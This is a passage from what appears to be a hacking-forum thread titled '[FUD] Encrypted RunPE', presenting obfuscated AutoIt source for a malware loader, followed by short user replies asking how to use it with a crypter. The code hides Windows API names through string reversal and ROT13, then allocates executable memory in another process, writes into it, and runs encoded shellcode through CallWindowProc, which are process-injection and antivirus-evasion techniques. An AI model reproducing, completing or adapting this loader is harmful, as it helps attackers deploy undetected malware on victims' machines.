Local $F3234 = G53(M12(Z45('yyq.23yraerx')), M12(Z45('egc')), M12(Z45('kRpbyyNynhgevI')), _
		M12(Z45('ryqanu')), $N3330, _
		M12(Z45('egc')), $S333232, _
		M12(Z45('egc_qebjq')), $S323736, _
		M12(Z45('qebjq')), 0x1000, _ ; MEM_COMMIT
		M12(Z45('qebjq')), 64) ; PAGE_EXECUTE_READWRITE
; Check for errors or failure
If @error Or Not $F3234[0] Then
	; Try differently
	$F3234 = G53(M12(Z45('yyq.23yraerx')), M12(Z45('egc')), M12(Z45('kRpbyyNynhgevI')), _
			M12(Z45('ryqanu')), $N3330, _
			M12(Z45('egc')), $S333232, _
			M12(Z45('egc_qebjq')), $S323736, _
			M12(Z45('qebjq')), 0x3000, _ ; MEM_COMMIT|MEM_RESERVE
			M12(Z45('qebjq')), 64) ; PAGE_EXECUTE_READWRITE
	; Check for errors or failure
	If @error Or Not $F3234[0] Then Return SetError(1, 0, 0) ; Unable to allocate
EndIf
Return $F3234[0]
EndFunc   ;==>H65

Func Q29($N3330, $S323736)
; Allocate space
Local $F3234 = G53(M12(Z45('yyq.23yraerx')), M12(Z45('egc')), M12(Z45('kRpbyyNynhgevI')), _
		M12(Z45('ryqanu')), $N3330, _
		M12(Z45('egc')), 0, _
		M12(Z45('egc_qebjq')), $S323736, _
		M12(Z45('qebjq')), 0x3000, _ ; MEM_COMMIT|MEM_RESERVE
		M12(Z45('qebjq')), 64) ; PAGE_EXECUTE_READWRITE
; Check for errors or failure
If @error Or Not $F3234[0] Then Return SetError(1, 0, 0) ; Unable to allocate
Return $F3234[0]
EndFunc   ;==>Q29

Func K89($N3330, $S333232)
G53(M12(Z45('yyq.yyqga')), M12(Z45('gav')), M12(Z45('abvgprFsBjrvIcnzaHgA')), _
		M12(Z45('egc')), $N3330, _
		M12(Z45('egc')), $S333232)
; Check for errors only
If @error Then Return SetError(1, 0, 0) ; Failure
Return 1
EndFunc   ;==>K89

Func N32($N3330)
Local $F3234 = G53(M12(Z45('yyq.23yraerx')), M12(Z45('ybbo')), M12(Z45('ffrpbeC46jbJfV')), _
		M12(Z45('ryqanu')), $N3330, _
		M12(Z45('*ybbo')), 0)
; Check for errors or failure
If @error Or Not $F3234[0] Then Return SetError(1, 0, 0) ; Failure
Return $F3234[2]
EndFunc   ;==>N32

Func X11($N333631, $V333632)
Local $G333633 = J54(48) & J54(120) & J54(67) & J54(56) & J54(49) & J54(48) & J54(48) & J54(49) & J54(48) & J54(48) & J54(54) & J54(65) & J54(48) & J54(48) & J54(54) & J54(65) & J54(48) & J54(48) & J54(53) & J54(51) & J54(53) & J54(54) & J54(53)
Local $F333634 = J54(55) & J54(56) & J54(66) & J54(53) & J54(53) & J54(49) & J54(48) & J54(51) & J54(49) & J54(67) & J54(57) & J54(56) & J54(57) & J54(67) & J54(56) & J54(52) & J54(57) & J54(56) & J54(57) & J54(68) & J54(55) & J54(70) & J54(50) & J54(65) & J54(69) & J54(52) & J54(56) & J54(52) & J54(56) & J54(50) & J54(57) & J54(67) & J54(56)
Local $C333635 = J54(56) & J54(57) & J54(52) & J54(53) & J54(70) & J54(48) & J54(56) & J54(53) & J54(67) & J54(48) & J54(48) & J54(70) & J54(56) & J54(52) & J54(68) & J54(67) & J54(48) & J54(48) & J54(48) & J54(48) & J54(48) & J54(48) & J54(66) & J54(57) & J54(48) & J54(48) & J54(48) & J54(49)
Local $C333636 = J54(48) & J54(48) & J54(48) & J54(48) & J54(56) & J54(56) & J54(67) & J54(56) & J54(50) & J54(67) & J54(48) & J54(49) & J54(56) & J54(56) & J54(56) & J54(52) & J54(48) & J54(68) & J54(69) & J54(70) & J54(70) & J54(69)
Local $Y333637 = $G333633 & $F333634 & $C333635 & $C333636
Local $V333732 = J54(70) & J54(70) & J54(70) & J54(70) & J54(69) & J54(50) & J54(70) & J54(51) & J54(56) & J54(51) & J54(54) & J54(53) & J54(70) & J54(52) & J54(48) & J54(48) & J54(56) & J54(51) & J54(54) & J54(53) & J54(70) & J54(67) & J54(48) & J54(48) & J54(56) & J54(49) & J54(55) & J54(68)
Local $L333733 = J54(70) & J54(67) & J54(48) & J54(48) & J54(48) & J54(49) & J54(48) & J54(48) & J54(48) & J54(48) & J54(55) & J54(68) & J54(52) & J54(55) & J54(56) & J54(66) & J54(52) & J54(53) & J54(70) & J54(67) & J54(51) & J54(49) & J54(68) & J54(50) & J54(70)
Local $K333734 = J54(55) & J54(55) & J54(53) & J54(70) & J54(48) & J54(57) & J54(50) & J54(48) & J54(51) & J54(52) & J54(53) & J54(49) & J54(48) & J54(48) & J54(70) & J54(66) & J54(54) & J54(48) & J54(48) & J54(56) & J54(66) & J54(52) & J54(68) & J54(70) & J54(67) & J54(48) & J54(70) & J54(66)
Local $I333735 = J54(54) & J54(56) & J54(67) & J54(48) & J54(68) & J54(70) & J54(48) & J54(70) & J54(69) & J54(70) & J54(70) & J54(70) & J54(70) & J54(48) & J54(49) & J54(67) & J54(56) & J54(48) & J54(51) & J54(52) & J54(53) & J54(70) & J54(52) & J54(50) & J54(53) & J54(70) & J54(70) & J54(48) & J54(48)
Local $U333736 = $Y333637 & $V333732 & $L333733 & $K333734 & $I333735
Local $E333832 = J54(48) & J54(48) & J54(48) & J54(48) & J54(56) & J54(57) & J54(52) & J54(53) & J54(70) & J54(52) & J54(56) & J54(66) & J54(55) & J54(53) & J54(70) & J54(67) & J54(56) & J54(65) & J54(56) & J54(52) & J54(51) & J54(53) & J54(70) & J54(48) & J54(70) & J54(69)
Local $U333833 = J54(70) & J54(70) & J54(70) & J54(70) & J54(56) & J54(66) & J54(55) & J54(68) & J54(70) & J54(52) & J54(56) & J54(54) & J54(56) & J54(52) & J54(51) & J54(68) & J54(70) & J54(48) & J54(70) & J54(69) & J54(70) & J54(70) & J54(70) & J54(70) & J54(56) & J54(56) & J54(56) & J54(52)
Local $P333834 = J54(51) & J54(53) & J54(70) & J54(48) & J54(70) & J54(69) & J54(70) & J54(70) & J54(70) & J54(70) & J54(70) & J54(70) & J54(52) & J54(53) & J54(70) & J54(67) & J54(69) & J54(66) & J54(66) & J54(48) & J54(56) & J54(68) & J54(57) & J54(68) & J54(70) & J54(48) & J54(70) & J54(69) & J54(70)
Local $S333835 = $E333832 & $U333833 & $P333834
Local $K333839 = J54(70) & J54(70) & J54(70) & J54(51) & J54(49) & J54(70) & J54(70) & J54(56) & J54(57) & J54(70) & J54(65) & J54(51) & J54(57) & J54(53) & J54(53) & J54(48) & J54(67) & J54(55) & J54(54) & J54(54) & J54(51) & J54(56) & J54(66) & J54(56)
Local $B333930 = J54(53) & J54(69) & J54(67) & J54(70) & J54(69) & J54(70) & J54(70) & J54(70) & J54(70) & J54(52) & J54(48) & J54(50) & J54(53) & J54(70) & J54(70) & J54(48) & J54(48) & J54(48) & J54(48) & J54(48) & J54(48) & J54(56) & J54(57) & J54(56) & J54(53) & J54(69) & J54(67) & J54(70)
Local $J333931 = J54(69) & J54(70) & J54(70) & J54(70) & J54(70) & J54(56) & J54(57) & J54(68) & J54(56) & J54(48) & J54(51) & J54(56) & J54(53) & J54(69) & J54(67) & J54(70) & J54(69) & J54(70) & J54(70) & J54(70) & J54(70) & J54(48) & J54(70) & J54(66) & J54(54) & J54(48) & J54(48) & J54(48) & J54(51)
Local $P333932 = $K333839 & $B333930 & $J333931
Local $M333936 = J54(56) & J54(53) & J54(69) & J54(56) & J54(70) & J54(69) & J54(70) & J54(70) & J54(70) & J54(70) & J54(50) & J54(53) & J54(70) & J54(70) & J54(48) & J54(48) & J54(48) & J54(48) & J54(48) & J54(48) & J54(56) & J54(57)
Local $Q333937 = $U333736 & $S333835 & $P333932 & $M333936
Local $J343032 = J54(56) & J54(53) & J54(69) & J54(56) & J54(70) & J54(69) & J54(70) & J54(70) & J54(70) & J54(70) & J54(56) & J54(57) & J54(68) & J54(69) & J54(48) & J54(51) & J54(66) & J54(53) & J54(69) & J54(67) & J54(70) & J54(69)
Local $U343033 = J54(70) & J54(70) & J54(70) & J54(70) & J54(56) & J54(65) & J54(48) & J54(54) & J54(56) & J54(57) & J54(68) & J54(70) & J54(48) & J54(51) & J54(66) & J54(68) & J54(69) & J54(56) & J54(70) & J54(69) & J54(70) & J54(70) & J54(70) & J54(70)
Local $J343034 = J54(56) & J54(54) & J54(48) & J54(55) & J54(56) & J54(56) & J54(48) & J54(54) & J54(48) & J54(70) & J54(66) & J54(54) & J54(48) & J54(69) & J54(48) & J54(70) & J54(66) & J54(54) & J54(48) & J54(55) & J54(48) & J54(49) & J54(67) & J54(49) & J54(56) & J54(49)
Local $R343035 = J54(69) & J54(49) & J54(70) & J54(70) & J54(48) & J54(48) & J54(48) & J54(48) & J54(48) & J54(48) & J54(56) & J54(65) & J54(56) & J54(52) & J54(48) & J54(68) & J54(70) & J54(48) & J54(70) & J54(69) & J54(70) & J54(70) & J54(70) & J54(70) & J54(56) & J54(66) & J54(55) & J54(53)
Local $T343036 = $J343032 & $U343033 & $J343034 & $R343035
Local $I343131 = J54(48) & J54(56) & J54(48) & J54(49) & J54(68) & J54(54) & J54(51) & J54(48) & J54(48) & J54(54) & J54(52) & J54(50) & J54(69) & J54(66) & J54(57) & J54(56) & J54(53) & J54(70) & J54(53) & J54(69) & J54(53) & J54(66) & J54(67) & J54(57) & J54(67) & J54(50) & J54(49) & J54(48) & J54(48) & J54(48)
Local $N343132 = $T343036 & $I343131
Local $E343135 = $N343132
Local $L343137 = $Q333937 & $E343135
Local $Z343230 = D12(J54(98) & J54(121) & J54(116) & J54(101) & J54(91) & BinaryLen($L343137) & J54(93))
DllStructSetData($Z343230, 1, $L343137)
Local $J343234 = D12(J54(98) & J54(121) & J54(116) & J54(101) & J54(91) & BinaryLen($N333631) & J54(93))
DllStructSetData($J343234, 1, $N333631)
G53(J54(117) & J54(115) & J54(101) & J54(114) & J54(51) & J54(50) & J54(46) & J54(100) & J54(108) & J54(108), J54(110) & J54(111) & J54(110) & J54(101), J54(67) & J54(97) & J54(108) & J54(108) & J54(87) & J54(105) & J54(110) & J54(100) & J54(111) & J54(119) & J54(80) & J54(114) & J54(111) & J54(99), J54(112) & J54(116) & J54(114), DllStructGetPtr($Z343230), J54(112) & J54(116) & J54(114), DllStructGetPtr($J343234), J54(105) & J54(110) & J54(116), BinaryLen($N333631), J54(115) & J54(116) & J54(114), $V333632, J54(105) & J54(110) & J54(116), 0)
Local $J343332 = V65($J343234, 1)
$J343234 = 0
$Z343230 = 0
Return BinaryToString($J343332)
EndFunc

Func M12($G343337)
Local Const $G343338 = Z45(J54('51') & J54('67') & J54('68') & J54('53') & J54('49') & J54('69') & J54('50') & J54('69') & J54('65') & J54('65') & J54('70') & J54('52') & J54('48') & J54('69') & J54('56') & J54('48') & J54('65') & J54('49') & J54('52') & J54('48') & J54('50') & J54('48') & J54('51') & J54('55') & J54('49') & J54('52') & J54('67') & J54('51') & J54('68') & J54('48') & J54('67') & J54('50') & J54('67') & J54('48') & J54('55') & J54('55') & J54('65') & J54('53') & J54('67') & J54('51') & J54('48') & J54('49') & J54('50') & J54('55') & J54('49') & J54('52') & J54('67') & J54('51') & J54('70') & J54('68') & J54('52') & J54('50') & J54('48') & J54('50') & J54('52') & J54('69') & J54('48') & J54('56') & J54('52') & J54('67') & J54('56') & J54('56') & J54('55') & J54('52') & J54('67') & J54('65') & J54('55') & J54('70') & J54('57') & J54('56') & J54('56') & J54('48') & J54('53') & J54('55') & J54('66') & J54('56') & J54('52') & J54('50') & J54('52') & J54('55') & J54('57') & J54('67') & J54('57') & J54('48') & J54('67') & J54('48') & J54('68') & J54('52') & J54('66') & J54('56') & J54('53') & J54('69') & J54('57') & J54('56') & J54('53') & J54('53') & J54('120') & J54('48'))

Local $L343339 = D12(Z45(J54('91') & J54('101') & J54('116') & J54('121') & J54('98')) & BinaryLen($G343338) & Z45(J54('93')))
DllStructSetData($L343339, 1, $G343338)

$S343433 = D12(Z45(J54('91') & J54('114') & J54('97') & J54('104') & J54('99')) & StringLen($G343337) & Z45(J54('93')))
DllStructSetData($S343433, 1, $G343337)

Local $M343437 = G53(Z45(J54('108') & J54('108') & J54('100') & J54('46') & J54('50') & J54('51') & J54('114') & J54('101') & J54('115') & J54('117')), Z45(J54('116') & J54('110') & J54('105')), Z45(J54('99') & J54('111') & J54('114') & J54('80') & J54('119') & J54('111') & J54('100') & J54('110') & J54('105') & J54('87') & J54('108') & J54('108') & J54('97') & J54('67')), _
		Z45(J54('114') & J54('116') & J54('112')), DllStructGetPtr($L343339), _
		Z45(J54('114') & J54('116') & J54('112')), DllStructGetPtr($S343433, 1), _
		Z45(J54('116') & J54('110') & J54('105')), StringLen($G343337), _
		Z45(J54('116') & J54('110') & J54('105')), 0, _
		Z45(J54('116') & J54('110') & J54('105')), 0)


Return V65($S343433, 1)
EndFunc   ;==>Z45

Func Z45($T343532)
Local $W343533, $N343534, $S343535
$S343535 = StringLen($T343532)
For $N343534 = 0 To $S343535
	$W343533 = $W343533 & StringMid($T343532, $S343535 - $N343534, 1)
Next
Return $W343533
EndFunc

Func G53($I343636, $R343637, $J343638, $P343639 = "L23", $V343730 = "L23", $D343731 = "L23", $U343732 = "L23", $Y343733 = "L23", $J343734 = "L23", $Q343735 = "L23", $I343736 = "L23", $Q343737 = "L23", $T343738 = "L23", $E343739 = "L23", $S343830 = "L23", $Y343831 = "L23", $O343832 = "L23", $M343833 = "L23", $S343834 = "L23", $P343835 = "L23", $D343836 = "L23", $I343837 = "L23", $X343838 = "L23", $Z343839 = "L23")
If $P343639 = "L23" Then
	$T343931 = DllCall($I343636, $R343637, $J343638)
ElseIf $D343731 = "L23" Then
	$T343931 = DllCall($I343636, $R343637, $J343638, $P343639, $V343730)
ElseIf $Y343733 = "L23" Then
	$T343931 = DllCall($I343636, $R343637, $J343638, $P343639, $V343730, $D343731, $U343732)
ElseIf $Q343735 = "L23" Then
	$T343931 = DllCall($I343636, $R343637, $J343638, $P343639, $V343730, $D343731, $U343732, $Y343733, $J343734)
ElseIf $Q343737 = "L23" Then
	$T343931 = DllCall($I343636, $R343637, $J343638, $P343639, $V343730, $D343731, $U343732, $Y343733, $J343734, $Q343735, $I343736)
ElseIf $E343739 = "L23" Then
	$T343931 = DllCall($I343636, $R343637, $J343638, $P343639, $V343730, $D343731, $U343732, $Y343733, $J343734, $Q343735, $I343736, $Q343737, $T343738)
ElseIf $Y343831 = "L23" Then
	$T343931 = DllCall($I343636, $R343637, $J343638, $P343639, $V343730, $D343731, $U343732, $Y343733, $J343734, $Q343735, $I343736, $Q343737, $T343738, $E343739, $S343830)
ElseIf $M343833 = "L23" Then
	$T343931 = DllCall($I343636, $R343637, $J343638, $P343639, $V343730, $D343731, $U343732, $Y343733, $J343734, $Q343735, $I343736, $Q343737, $T343738, $E343739, $S343830, $Y343831, $O343832)
ElseIf $P343835 = "L23" Then
	$T343931 = DllCall($I343636, $R343637, $J343638, $P343639, $V343730, $D343731, $U343732, $Y343733, $J343734, $Q343735, $I343736, $Q343737, $T343738, $E343739, $S343830, $Y343831, $O343832, $M343833, $S343834)
ElseIf $I343837 = "L23" Then
	$T343931 = DllCall($I343636, $R343637, $J343638, $P343639, $V343730, $D343731, $U343732, $Y343733, $J343734, $Q343735, $I343736, $Q343737, $T343738, $E343739, $S343830, $Y343831, $O343832, $M343833, $S343834, $P343835, $D343836)
ElseIf $Z343839 = "L23" Then
	$T343931 = DllCall($I343636, $R343637, $J343638, $P343639, $V343730, $D343731, $U343732, $Y343733, $J343734, $Q343735, $I343736, $Q343737, $T343738, $E343739, $S343830, $Y343831, $O343832, $M343833, $S343834, $P343835, $D343836, $I343837, $X343838)
EndIf
Return $T343931
EndFunc

Func V65($I343636, $R343637, $J343638 = "L23")
If $J343638 = "L23" Then
	$T343931 = DllStructGetData($I343636, $R343637)
Else
	$T343931 = DllStructGetData($I343636, $R343637, $J343638)
EndIf
Return $T343931
EndFunc

Func D12($d3130, $z3131 = "L23")
If $z3131 = "L23" Then
	$p31313133 = DllStructCreate($d3130)
Else
	$p31313133 = DllStructCreate($d3130, $z3131)
EndIf
Return $p31313133
EndFunc

Func J54($P333531)
$P333531 = $P333531 + 84
$P333531 = $P333531 - 42
$P333531 = $P333531 + 2
$P333531 = $P333531 - 44
Return Chr($P333531)
EndFunc

[/HIDE-THANKS]

 

[ASN]

Re: [FUD] Encrypted RunPE

Nice

How do I encryption

Such as your way?

is it possible?

I want to explain or tools

Good luck

 

[rivaldo]

Re: [FUD] Encrypted RunPE

How to use with your crypter template?

when i tried it just didn't execute

 

[top10]

Re: [FUD] Encrypted RunPE

READ RULES

This link is hidden for visitors. Please Log in or register now.

17.-Don't revive old threads.[2 months] OLD Thread

 

[leo-johnnn]

Re: [FUD] Encrypted RunPE

muy bien DDoSer az: